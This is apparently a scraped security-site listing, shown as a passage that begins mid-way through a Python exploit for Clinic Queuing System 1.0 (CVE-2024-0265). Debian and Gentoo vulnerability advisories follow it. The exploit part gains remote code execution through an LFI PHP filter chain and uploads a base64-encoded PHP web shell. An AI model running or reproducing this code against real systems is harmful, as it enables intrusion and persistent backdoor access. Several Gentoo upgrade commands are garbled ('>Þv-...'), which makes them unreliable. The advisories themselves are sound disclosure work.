added!\n")    print("[*] Initiating Phase 2")    phase2(rand_user, rand_pass)  else:    print("[X] user creation failed :(")    die()def phase2(user, password): # CVE-2024-0265  s = requests.Session();  login_data = {'formToken':'','username':user, 'password':password}  print("[*] Loggin in....")  phase2 = s.post(phase2_url, login_data)  if "Login successfully." in phase2.text:    print("[+] Login success")  else:    print("[X] Login failed.")    die()  print("[+] Preparing for RCE via LFI PHP FIlter Chaining...\n")  rce_url = base_url + "/?page=" + filter_chain + "&0=echo '|jmrcsnchz|<pre>'.shell_exec('id').'</pre>';"  #print("[*] Payload: " + rce_url)  rce = s.get(rce_url)    if "jmrcsnchz" in rce.text:    print("[+] RCE success!")    soup = BeautifulSoup(rce.text, 'html.parser')    print("[+] Output of id: " + soup.pre.get_text())    print("[*] Uploading php backdoor....")    s.get(base_url + "/?page=" + filter_chain + "&0=file_put_contents('rce.php',base64_decode('PD89YCRfR0VUWzBdYD8%2b'));")    print("[+] Access at " + base_url + "/rce.php?0=whoami")  else:    print("[X] Exploit failed. Try debugging the script or pass this script onto a proxy to investigate.")    die()try:  print("[*] Initiating Phase 1")  phase1()except:  print("Exploit failed.")

Clinic Queuing System 1.0 Remote Code Execution

Debian Linux Security Advisory 5684-1 - The following vulnerabilities have been discovered in the WebKitGTK web engine. Kacper Kwapisz discovered that visiting a malicious website may lead to address bar spoofing. Nan Wang and Rushikesh Nandedkar discovered that processing maliciously crafted web content may lead to arbitrary code execution. SungKwon Lee discovered that processing web content may lead to a denial-of-service. Various other issues were also addressed.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5684-1                   security@debian.org  
https://www.debian.org/security/                           Alberto Garcia  
May 09, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : webkit2gtk  
CVE ID         : CVE-2023-42843 CVE-2023-42950 CVE-2023-42956 CVE-2024-23252  
                 CVE-2024-23254 CVE-2024-23263 CVE-2024-23280 CVE-2024-23284

The following vulnerabilities have been discovered in the WebKitGTK  
web engine:

CVE-2023-42843

    Kacper Kwapisz discovered that visiting a malicious website may  
    lead to address bar spoofing.

CVE-2023-42950

    Nan Wang and Rushikesh Nandedkar discovered that processing  
    maliciously crafted web content may lead to arbitrary code  
    execution.

CVE-2023-42956

    SungKwon Lee discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23252

    anbu1024 discovered that processing web content may lead to a  
    denial-of-service.

CVE-2024-23254

    James Lee discovered that a malicious website may exfiltrate audio  
    data cross-origin.

CVE-2024-23263

    Johan Carlsson discovered that processing maliciously crafted web  
    content may prevent Content Security Policy from being enforced.

CVE-2024-23280

    An anonymous researcher discovered that a maliciously crafted  
    webpage may be able to fingerprint the user.

CVE-2024-23284

    Georg Felber and Marco Squarcina discovered that processing  
    maliciously crafted web content may prevent Content Security  
    Policy from being enforced.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 2.44.1-1~deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 2.44.1-1~deb12u1.

We recommend that you upgrade your webkit2gtk packages.

For the detailed security status of webkit2gtk please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/webkit2gtk

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEYrwugQBKzlHMYFizAAyEYu0C2AIFAmY8e60ACgkQAAyEYu0C  
2ALK/g/7BzT5OfeZ1/2nK7TVdiyOjPuQgoZBqIV1LAmUBy5gHvKjOtrujqI9pVaU  
DZtGhgfRwu2AZjAvR1A5gCNTwWyGhvFrLN23/BaloxcveYr6iY6HuYFymlQp24fM  
o35x8DQJySgO3cGmNR1GwwLatr3dVrHh+Kot1J449G4mqlQxH4UQ8ytWOSfpWLdZ  
3ndArvVrO35eBUgPbUEooPHITSlusZQPbaVJkmU69zbpW1z220sQldSmObWHbAGG  
41NHl74LMqe64tI5EfrgSwdY7L+FEby/M0JlO37e1Hut0WpQckHuNgrlq6IO20Ed  
h80kmkN91TDCihQ1vovZaTbg9bCYcSYCWBxPGomip1v8EL1AybO8c7pEI/v/lcVO  
x4Ya6++JrJ1994U5esZB7VC0ucEUOc0SqwARyHv6NMmkKxxIPv2YdqPFE196x2Ns  
1rTM6dMriuCaKLOb2WUtOawLKPnBNQ0dRS1JLcNDA1Dy9zbDDB6ev8idKnixRMbv  
EOyZjBm8RTBK7dGw0BlTdHAoCZvczQJvinAJptvL+771qwcwq7SaL+6L1Ht1MGcN  
WS+wrb+DzpSvfprtv5Qvs0NEpmGISwbK3T/XOEnyyKMQdhemNtpvjWvF+0WNBf/d  
3nPAa5F9ZxJJMEuJFjAmm/HiK3R6Uko899yBtNbDkJbbA+vQlM8=MdSz  
-----END PGP SIGNATURE-----

Debian Security Advisory 5684-1

Debian Linux Security Advisory 5685-1 - Several security vulnerabilities have been discovered in Wordpress, a popular content management framework, which may lead to exposure of sensitive information to an unauthorized actor in WordPress or allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5685-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
May 08, 2024                          https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : wordpress  
CVE ID         : CVE-2023-2745 CVE-2023-5561 CVE-2023-38000 CVE-2023-39999  
                 CVE-2024-31210  
Debian Bug     : 1036296

Several security vulnerabilities have been discovered in Wordpress, a popular  
content management framework, which may lead to exposure of sensitive  
information to an unauthorized actor in WordPress or allowing unauthenticated  
attackers to discern the email addresses of users who have published public  
posts on an affected website via an Oracle style attack.

Furthermore this update resolves a possible cross-site-scripting vulnerability,  
a PHP File Upload bypass via the plugin installer and a possible remote code  
execution vulnerability which requires an attacker to control all the  
properties of a deserialized object though.

For the oldstable distribution (bullseye), these problems have been fixed  
in version 5.7.11+dfsg1-0+deb11u1.

For the stable distribution (bookworm), these problems have been fixed in  
version 6.1.6+dfsg1-0+deb12u1.

We recommend that you upgrade your wordpress packages.

For the detailed security status of wordpress please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/wordpress

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmY78XJfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeRBIBAAlHttuzHU3awlLA5WFHprj6S3PJA2YQSQjt+Ejk+pFGVpHjs4/gaI8S/t  
3rb9hEf2ClK6NdNxqAHSNzOuYLAG3S1rfATtQGfxEpYTBrngXKSUgFltElhRBACe  
GOLxtfh7Yha94hbf/HBiFEpKEmFXLnmGuSv1M0z77SEcNEdQ0sd5Be5VDwKcxnY6  
FYrrvoFjYUiDj66B19/B8ytUlRb7Mgr8KakqOiO6jzINL/mtJ52pcd63+JrkBF0L  
8br30YKxII9Rb10ygBhl5AzjhC/yrQexVtYyK0l1avm7/JC08kxDch++ANRekCJA  
kTx0ARi2AZJv1ktzm1DIfxNLrLtiCTJjSFFi6/WTCW3UAFNiVbEQOYal95lKBLXG  
V6AJhYYYPI3rbwnUJX5FZn4PEKoHTXotuveqdGHF2727ROUrConLZrrBa/hovj7v  
GPIe4SZZHLizK2CO84Gxgy7mI4F46I2C6TlIMvsJKyL1XUopti+Ds8f7e5AIgzB9  
rSkYPTBfLsm5fIeVpodja1qJMQdo9NklnamaPnbjL8BTmExedf638WYJfMLBqgXY  
Kl9M6uSwfBpl2dfvKqg2iUos359X65Nt+Cd3Ve5zsSigDssvsQ7YTV/TJHMavq6z  
f294k2zHfMaCiathCpOayN8KFX7WHeBEL8N8j/bukYgFaHD8y5o=qCem  
-----END PGP SIGNATURE-----

Debian Security Advisory 5685-1

Gentoo Linux Security Advisory 202405-29 - Multiple vulnerabilities have been discovered in Node.js. Versions greater than or equal to 16.20.2 are affected.

    - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Gentoo Linux Security Advisory                           GLSA 202405-29- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -                                           https://security.gentoo.org/- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Low    Title: Node.js: Multiple Vulnerabilities     Date: May 08, 2024     Bugs: #772422, #781704, #800986, #805053, #807775, #811273, #817938, #831037, #835615, #857111, #865627, #872692, #879617, #918086, #918614       ID: 202405-29- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -Synopsis=======Multiple vulnerabilities have been discovered in Node.js.Background=========Node.js is a JavaScript runtime built on Chrome’s V8 JavaScript engine.Affected packages================Package          Vulnerable    Unaffected---------------  ------------  ------------net-libs/nodejs  < 16.20.2     >= 16.20.2Description==========Multiple vulnerabilities have been discovered in Node.js. Please reviewthe CVE identifiers referenced below for details.Impact=====Please review the referenced CVE identifiers for details.Workaround=========There is no known workaround at this time.Resolution=========All Node.js 20 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-20.5.1"All Node.js 18 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-18.17.1"All Node.js 16 users should upgrade to the latest version:  # emerge --sync  # emerge --ask --oneshot --verbose ">=net-libs/nodejs-16.20.2"References=========[ 1 ] CVE-2020-7774      https://nvd.nist.gov/vuln/detail/CVE-2020-7774[ 2 ] CVE-2021-3672      https://nvd.nist.gov/vuln/detail/CVE-2021-3672[ 3 ] CVE-2021-22883      https://nvd.nist.gov/vuln/detail/CVE-2021-22883[ 4 ] CVE-2021-22884      https://nvd.nist.gov/vuln/detail/CVE-2021-22884[ 5 ] CVE-2021-22918      https://nvd.nist.gov/vuln/detail/CVE-2021-22918[ 6 ] CVE-2021-22930      https://nvd.nist.gov/vuln/detail/CVE-2021-22930[ 7 ] CVE-2021-22931      https://nvd.nist.gov/vuln/detail/CVE-2021-22931[ 8 ] CVE-2021-22939      https://nvd.nist.gov/vuln/detail/CVE-2021-22939[ 9 ] CVE-2021-22940      https://nvd.nist.gov/vuln/detail/CVE-2021-22940[ 10 ] CVE-2021-22959      https://nvd.nist.gov/vuln/detail/CVE-2021-22959[ 11 ] CVE-2021-22960      https://nvd.nist.gov/vuln/detail/CVE-2021-22960[ 12 ] CVE-2021-37701      https://nvd.nist.gov/vuln/detail/CVE-2021-37701[ 13 ] CVE-2021-37712      https://nvd.nist.gov/vuln/detail/CVE-2021-37712[ 14 ] CVE-2021-39134      https://nvd.nist.gov/vuln/detail/CVE-2021-39134[ 15 ] CVE-2021-39135      https://nvd.nist.gov/vuln/detail/CVE-2021-39135[ 16 ] CVE-2021-44531      https://nvd.nist.gov/vuln/detail/CVE-2021-44531[ 17 ] CVE-2021-44532      https://nvd.nist.gov/vuln/detail/CVE-2021-44532[ 18 ] CVE-2021-44533      https://nvd.nist.gov/vuln/detail/CVE-2021-44533[ 19 ] CVE-2022-0778      https://nvd.nist.gov/vuln/detail/CVE-2022-0778[ 20 ] CVE-2022-3602      https://nvd.nist.gov/vuln/detail/CVE-2022-3602[ 21 ] CVE-2022-3786      https://nvd.nist.gov/vuln/detail/CVE-2022-3786[ 22 ] CVE-2022-21824      https://nvd.nist.gov/vuln/detail/CVE-2022-21824[ 23 ] CVE-2022-32212      https://nvd.nist.gov/vuln/detail/CVE-2022-32212[ 24 ] CVE-2022-32213      https://nvd.nist.gov/vuln/detail/CVE-2022-32213[ 25 ] CVE-2022-32214      https://nvd.nist.gov/vuln/detail/CVE-2022-32214[ 26 ] CVE-2022-32215      https://nvd.nist.gov/vuln/detail/CVE-2022-32215[ 27 ] CVE-2022-32222      https://nvd.nist.gov/vuln/detail/CVE-2022-32222[ 28 ] CVE-2022-35255      https://nvd.nist.gov/vuln/detail/CVE-2022-35255[ 29 ] CVE-2022-35256      https://nvd.nist.gov/vuln/detail/CVE-2022-35256[ 30 ] CVE-2022-35948      https://nvd.nist.gov/vuln/detail/CVE-2022-35948[ 31 ] CVE-2022-35949      https://nvd.nist.gov/vuln/detail/CVE-2022-35949[ 32 ] CVE-2022-43548      https://nvd.nist.gov/vuln/detail/CVE-2022-43548[ 33 ] CVE-2023-30581      https://nvd.nist.gov/vuln/detail/CVE-2023-30581[ 34 ] CVE-2023-30582      https://nvd.nist.gov/vuln/detail/CVE-2023-30582[ 35 ] CVE-2023-30583      https://nvd.nist.gov/vuln/detail/CVE-2023-30583[ 36 ] CVE-2023-30584      https://nvd.nist.gov/vuln/detail/CVE-2023-30584[ 37 ] CVE-2023-30586      https://nvd.nist.gov/vuln/detail/CVE-2023-30586[ 38 ] CVE-2023-30587      https://nvd.nist.gov/vuln/detail/CVE-2023-30587[ 39 ] CVE-2023-30588      https://nvd.nist.gov/vuln/detail/CVE-2023-30588[ 40 ] CVE-2023-30589      https://nvd.nist.gov/vuln/detail/CVE-2023-30589[ 41 ] CVE-2023-30590      https://nvd.nist.gov/vuln/detail/CVE-2023-30590[ 42 ] CVE-2023-32002      https://nvd.nist.gov/vuln/detail/CVE-2023-32002[ 43 ] CVE-2023-32003      https://nvd.nist.gov/vuln/detail/CVE-2023-32003[ 44 ] CVE-2023-32004      https://nvd.nist.gov/vuln/detail/CVE-2023-32004[ 45 ] CVE-2023-32005      https://nvd.nist.gov/vuln/detail/CVE-2023-32005[ 46 ] CVE-2023-32006      https://nvd.nist.gov/vuln/detail/CVE-2023-32006[ 47 ] CVE-2023-32558      https://nvd.nist.gov/vuln/detail/CVE-2023-32558[ 48 ] CVE-2023-32559      https://nvd.nist.gov/vuln/detail/CVE-2023-32559Availability===========This GLSA and any updates to it are available for viewing atthe Gentoo Security Website: https://security.gentoo.org/glsa/202405-29Concerns?========Security is a primary focus of Gentoo Linux and ensuring theconfidentiality and security of our users' machines is of utmostimportance to us. Any security concerns should be addressed tosecurity@gentoo.org or alternatively, you may file a bug athttps://bugs.gentoo.org.License======Copyright 2024 Gentoo Foundation, Inc; referenced textbelongs to its owner(s).The contents of this document are licensed under theCreative Commons - Attribution / Share Alike license.https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-29

Gentoo Linux Security Advisory 202405-28 - Multiple vulnerabilities have been discovered in NVIDIA Drivers, the worst of which could result in root privilege escalation. Versions greater than or equal to 470.223.02 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-28  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: NVIDIA Drivers: Multiple Vulnerabilities  
     Date: May 08, 2024  
     Bugs: #909226, #916583  
       ID: 202405-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in NVIDIA Drivers, the  
worst of which could result in root privilege escalation.

Background  
=========  
NVIDIA Drivers are NVIDIA's accelerated graphics driver.

Affected packages  
================  
Package                     Vulnerable    Unaffected  
--------------------------  ------------  -------------  
x11-drivers/nvidia-drivers  < 470.223.02  >= 470.223.02

Description  
==========  
Multiple vulnerabilities have been discovered in NVIDIA Drivers. Please  
review the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All NVIDIA Drivers 470 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-470.223.02:0/470"

All NVIDIA Drivers 525 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-525.147.05:0/525"

All NVIDIA Drivers 535 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=x11-drivers/nvidia-drivers-535.129.03:0/535"

References  
=========  
[ 1 ] CVE-2023-25515  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25515  
[ 2 ] CVE-2023-25516  
      https://nvd.nist.gov/vuln/detail/CVE-2023-25516  
[ 3 ] CVE-2023-31022  
      https://nvd.nist.gov/vuln/detail/CVE-2023-31022

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-28

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-28

Gentoo Linux Security Advisory 202405-27 - A vulnerability has been discovered in Epiphany, which can lead to a buffer overflow. Versions greater than or equal to 42.4 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-27  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: Epiphany: Buffer Overflow  
     Date: May 08, 2024  
     Bugs: #839786  
       ID: 202405-27

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
A vulnerability has been discovered in Epiphany, which can lead to a  
buffer overflow.

Background  
=========  
Epiphany is a GNOME webbrowser based on the Mozilla rendering engine  
Gecko.

Affected packages  
================  
Package              Vulnerable    Unaffected  
-------------------  ------------  ------------  
www-client/epiphany  < 42.4        >= 42.4

Description  
==========  
A vulnerability has been discovered in Epiphany. Please review the CVE  
identifier referenced below for details.

Impact  
=====  
In GNOME Epiphany an HTML document can trigger a client buffer overflow  
(in ephy_string_shorten) via a long page title. The issue occurs because  
the number of bytes for a UTF-8 ellipsis character is not properly  
considered.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All Epiphany users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">=www-client/epiphany-42.4"

References  
=========  
[ 1 ] CVE-2022-29536  
      https://nvd.nist.gov/vuln/detail/CVE-2022-29536

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-27

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-27

Gentoo Linux Security Advisory 202405-26 - Multiple vulnerabilities have been discovered in qtsvg, the worst of which could lead to a denial of service. Versions greater than or equal to 5.15.9-r1 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-26  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: qtsvg: Multiple Vulnerabilities  
     Date: May 08, 2024  
     Bugs: #830381, #906465  
       ID: 202405-26

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in qtsvg, the worst of  
which could lead to a denial of service.

Background  
=========  
qtsvg is a SVG rendering library for the Qt framework.

Affected packages  
================  
Package       Vulnerable    Unaffected  
------------  ------------  ------------  
dev-qt/qtsvg  < 5.15.9-r1   >= 5.15.9-r1

Description  
==========  
Multiple vulnerabilities have been discovered in qtsvg. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All qtsvg users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-qt/qtsvg-5.15.9-r1:5"

References  
=========  
[ 1 ] CVE-2021-45930  
      https://nvd.nist.gov/vuln/detail/CVE-2021-45930  
[ 2 ] CVE-2023-32573  
      https://nvd.nist.gov/vuln/detail/CVE-2023-32573

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-26

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Gentoo Linux Security Advisory 202405-26

Gentoo Linux Security Advisory 202405-25 - Multiple vulnerabilities have been discovered in MariaDB, the worst fo which can lead to arbitrary execution of code. Versions greater than or equal to 10.11.3:10.11 are affected.

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
Gentoo Linux Security Advisory                           GLSA 202405-25  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -  
                                           https://security.gentoo.org/  
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

 Severity: Normal  
    Title: MariaDB: Multiple Vulnerabilities  
     Date: May 08, 2024  
     Bugs: #699874, #822759, #832490, #838244, #847526, #856484, #891781  
       ID: 202405-25

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis  
=======  
Multiple vulnerabilities have been discovered in MariaDB, the worst fo  
which can lead to arbitrary execution of code.

Background  
=========  
MariaDB is an enhanced, drop-in replacement for MySQL.

Affected packages  
================  
Package         Vulnerable       Unaffected  
--------------  ---------------  ----------------  
dev-db/mariadb  < 10.11.3:10.11  >= 10.11.3:10.11  
                < 10.11.3:10.6   >= 10.6.13:10.6  
                < 10.11.3        >= 10.6.13

Description  
==========  
Multiple vulnerabilities have been discovered in MariaDB. Please review  
the CVE identifiers referenced below for details.

Impact  
=====  
Please review the referenced CVE identifiers for details.

Workaround  
=========  
There is no known workaround at this time.

Resolution  
=========  
All MariaDB 10.6 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/mariadb-10.11.3:10.6"

All MariaDB 10.11 users should upgrade to the latest version:

  # emerge --sync  
  # emerge --ask --oneshot --verbose ">Þv-db/mariadb-10.11.3:10.11"

References  
=========  
[ 1 ] CVE-2019-2938  
      https://nvd.nist.gov/vuln/detail/CVE-2019-2938  
[ 2 ] CVE-2019-2974  
      https://nvd.nist.gov/vuln/detail/CVE-2019-2974  
[ 3 ] CVE-2021-46661  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46661  
[ 4 ] CVE-2021-46662  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46662  
[ 5 ] CVE-2021-46663  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46663  
[ 6 ] CVE-2021-46664  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46664  
[ 7 ] CVE-2021-46665  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46665  
[ 8 ] CVE-2021-46666  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46666  
[ 9 ] CVE-2021-46667  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46667  
[ 10 ] CVE-2021-46668  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46668  
[ 11 ] CVE-2021-46669  
      https://nvd.nist.gov/vuln/detail/CVE-2021-46669  
[ 12 ] CVE-2022-24048  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24048  
[ 13 ] CVE-2022-24050  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24050  
[ 14 ] CVE-2022-24051  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24051  
[ 15 ] CVE-2022-24052  
      https://nvd.nist.gov/vuln/detail/CVE-2022-24052  
[ 16 ] CVE-2022-27376  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27376  
[ 17 ] CVE-2022-27377  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27377  
[ 18 ] CVE-2022-27378  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27378  
[ 19 ] CVE-2022-27379  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27379  
[ 20 ] CVE-2022-27380  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27380  
[ 21 ] CVE-2022-27381  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27381  
[ 22 ] CVE-2022-27382  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27382  
[ 23 ] CVE-2022-27383  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27383  
[ 24 ] CVE-2022-27384  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27384  
[ 25 ] CVE-2022-27385  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27385  
[ 26 ] CVE-2022-27386  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27386  
[ 27 ] CVE-2022-27444  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27444  
[ 28 ] CVE-2022-27445  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27445  
[ 29 ] CVE-2022-27446  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27446  
[ 30 ] CVE-2022-27447  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27447  
[ 31 ] CVE-2022-27448  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27448  
[ 32 ] CVE-2022-27449  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27449  
[ 33 ] CVE-2022-27451  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27451  
[ 34 ] CVE-2022-27452  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27452  
[ 35 ] CVE-2022-27455  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27455  
[ 36 ] CVE-2022-27456  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27456  
[ 37 ] CVE-2022-27457  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27457  
[ 38 ] CVE-2022-27458  
      https://nvd.nist.gov/vuln/detail/CVE-2022-27458  
[ 39 ] CVE-2022-31621  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31621  
[ 40 ] CVE-2022-31622  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31622  
[ 41 ] CVE-2022-31623  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31623  
[ 42 ] CVE-2022-31624  
      https://nvd.nist.gov/vuln/detail/CVE-2022-31624  
[ 43 ] CVE-2022-32081  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32081  
[ 44 ] CVE-2022-32082  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32082  
[ 45 ] CVE-2022-32083  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32083  
[ 46 ] CVE-2022-32084  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32084  
[ 47 ] CVE-2022-32085  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32085  
[ 48 ] CVE-2022-32086  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32086  
[ 49 ] CVE-2022-32088  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32088  
[ 50 ] CVE-2022-32089  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32089  
[ 51 ] CVE-2022-32091  
      https://nvd.nist.gov/vuln/detail/CVE-2022-32091  
[ 52 ] CVE-2022-38791  
      https://nvd.nist.gov/vuln/detail/CVE-2022-38791  
[ 53 ] CVE-2022-47015  
      https://nvd.nist.gov/vuln/detail/CVE-2022-47015  
[ 54 ] CVE-2023-5157  
      https://nvd.nist.gov/vuln/detail/CVE-2023-5157

Availability  
===========  
This GLSA and any updates to it are available for viewing at  
the Gentoo Security Website:

 https://security.gentoo.org/glsa/202405-25

Concerns?  
========  
Security is a primary focus of Gentoo Linux and ensuring the  
confidentiality and security of our users' machines is of utmost  
importance to us. Any security concerns should be addressed to  
security@gentoo.org or alternatively, you may file a bug at  
https://bugs.gentoo.org.

License  
======  
Copyright 2024 Gentoo Foundation, Inc; referenced text  
belongs to its owner(s).

The contents of this document are licensed under the  
Creative Commons - Attribution / Share Alike license.

https://creativecommons.org/licenses/by-sa/2.5

Tag

#web